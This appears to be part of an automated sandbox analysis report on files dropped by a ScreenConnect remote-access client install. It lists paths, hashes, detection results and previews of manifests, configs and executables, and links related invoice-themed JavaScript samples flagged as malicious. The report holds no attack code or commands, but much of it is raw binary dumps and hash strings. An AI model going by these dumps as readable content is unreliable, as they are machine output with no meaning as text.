Preview:	PcmH........`...M.w.@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$............?..]k.........}'.d................z..w.....[~31.X......E..X.....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u)...O.&r..Vz,...F.....Ey/...[s.T..<2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...........................................................................y.......................

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2569
Entropy (8bit):	5.027116382154264
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
MD5:	6A1C3FF3E8F5E23698453B4CCDA2FD12
SHA1:	C7EED4383B7F1982222E663A0B8850D09B6B20EF
SHA-256:	8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
SHA-512:	C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.732289075374506
Encrypted:	false
SSDEEP:	48:2KqQ/cZgome6S+9oww7gV7ztoVXeSnxW6xe1YeCY+1Fnwb8:2Kl/cYeV+WwwSztoV7xhxwYeCY+vnE8
MD5:	26968F190F6B0F76388BDFA9E1BBF49D
SHA1:	B108A14B89B760F8409E6C27DDE637E889593A19
SHA-256:	835360AAEC415ADA76CCAAD375340881A787EFD59A6164BF6EBEB2B48DDA5D0F
SHA-512:	3CEC121994FE34E65B1C91F79E92E36E04B52C5969794BF201B5E32B2C7C0CB780ED72D927384EA1E1DFA2083DAB58105A18A2525667A6E272EBFA66998C88C4
Malicious:	false
Preview:	PcmH.........."..Q.j............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$............?..]k.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................y...............................................y...............................................y...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............<...........MdSp ...$....... ...".............n: urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.151589954158412
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
MD5:	618DC5F6C85A2057BC7A86C5F498E2F1
SHA1:	5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
SHA-256:	F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
SHA-512:	A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14608
Entropy (8bit):	5.719782705418142
Encrypted:	false
SSDEEP:	192:WMhI9rf6h9o8s8owwSzN8s8oTN2x2QPIlFDLhEDh7BqWojOK:WMy9rf6QX9mxX9R/QPIBM7Yjl
MD5:	7F90F9A85C8304236E146045BC6F90C8
SHA1:	BFD4CA3D1D43B72F4961545F36DF679393894DF1
SHA-256:	CE55FC303A9ED5D195F9EE3381C2E9BBBDACC1D93D37DCDD720DA1BEF497C504
SHA-512:	E3AD703DB8C7B8DD62B85A7ADBD806EE6E57FF1EAA21337DA214CBBD07C6B0B29BA1B6DC528DCD0B4F13E3DA5E54EC8BBDA9776085C425334A71C1095D89D5FA
Malicious:	false
Preview:	PcmH...........T...$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$............?..]k..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%.q..T#..=W...K...Oi...............-........................E..................................y...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.3.7.9067%........................

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
Category:	dropped
Size (bytes):	117161
Entropy (8bit):	5.583971122293747
Encrypted:	false
SSDEEP:	3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
MD5:	FE06C5E9C53AB451368667D3E3B1504B
SHA1:	7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
SHA-256:	89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
SHA-512:	B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.227291560973593
Encrypted:	false
SSDEEP:	96:GWa3beV+Ww8x45um+cc86uZB9izFabn6GyVf:GfcJiumv3VGW6b
MD5:	0F5D901661B0CCEC950DDAAEFA9FC42B
SHA1:	495B8A849A9244E2E37B31F55715D1554790F202
SHA-256:	5180293C7F0D8A57A304CF0B4796081C1BDA0009972E5ADCB7A597F47AC53C9C
SHA-512:	F1FE4E42424896A3BA38DF8D103E52EC30A22D71751DD93084B17C482B5ABEE4B361E239DCABAB43C2C2DAB0CC1D6B1241208E3D9A65BEBF21A4D844A3933D56
Malicious:	false
Preview:	PcmH............T..',...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$............?..]k........6...................z..w.....[~31.X......E..X.....s".I...R....y..&..d......B(.........O.&r..Vz!...[s.T..<$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...8.......`.......h...(...\|...................(...............L...........0...............................................y...............................................y...............................................y...............................................y...............................................y...............................................y...nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1632
Entropy (8bit):	5.089918322084496
Encrypted:	false
SSDEEP:	48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
MD5:	4E77158D54337B51A6368D7D094397C4
SHA1:	3A029B30B95786ADF97FB3C0B1C37B11154E0344
SHA-256:	276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
SHA-512:	69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95512
Entropy (8bit):	6.504684691533346
Encrypted:	false
SSDEEP:	1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
MD5:	75B21D04C69128A7230A0998086B61AA
SHA1:	244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
SHA-256:	F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
SHA-512:	8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Rechnung_10401.js, Detection: malicious, Browse Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61208
Entropy (8bit):	6.310126082367387
Encrypted:	false
SSDEEP:	1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
MD5:	AFA97CAF20F3608799E670E9D6253247
SHA1:	7E410FDE0CA1350AA68EF478E48274888688F8EE
SHA-256:	E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
SHA-512:	FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Rechnung_10401.js, Detection: malicious, Browse Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81688
Entropy (8bit):	5.8618809599146005
Encrypted:	false
SSDEEP:	1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
MD5:	1AEE526DC110E24D1399AFFCCD452AB3
SHA1:	04DB0E8772933BC57364615D0D104DC2550BD064
SHA-256:	EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
SHA-512:	482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.034211651049746
Encrypted:	false
SSDEEP:	12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
MD5:	14E7489FFEBBB5A2EA500F796D881AD9
SHA1:	0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:	A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:	2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639085961200334
Encrypted:	false
SSDEEP:	24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
MD5:	9AD3964BA3AD24C42C567E47F88C82B2
SHA1:	6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
SHA-256:	84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
SHA-512:	CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..\|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...\|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	602392
Entropy (8bit):	6.176232491934078
Encrypted:	false
SSDEEP:	6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
MD5:	1778204A8C3BC2B8E5E4194EDBAF7135
SHA1:	0203B65E92D2D1200DD695FE4C334955BEFBDDD3
SHA-256:	600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
SHA-512:	A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.586775768189165
Encrypted:	false
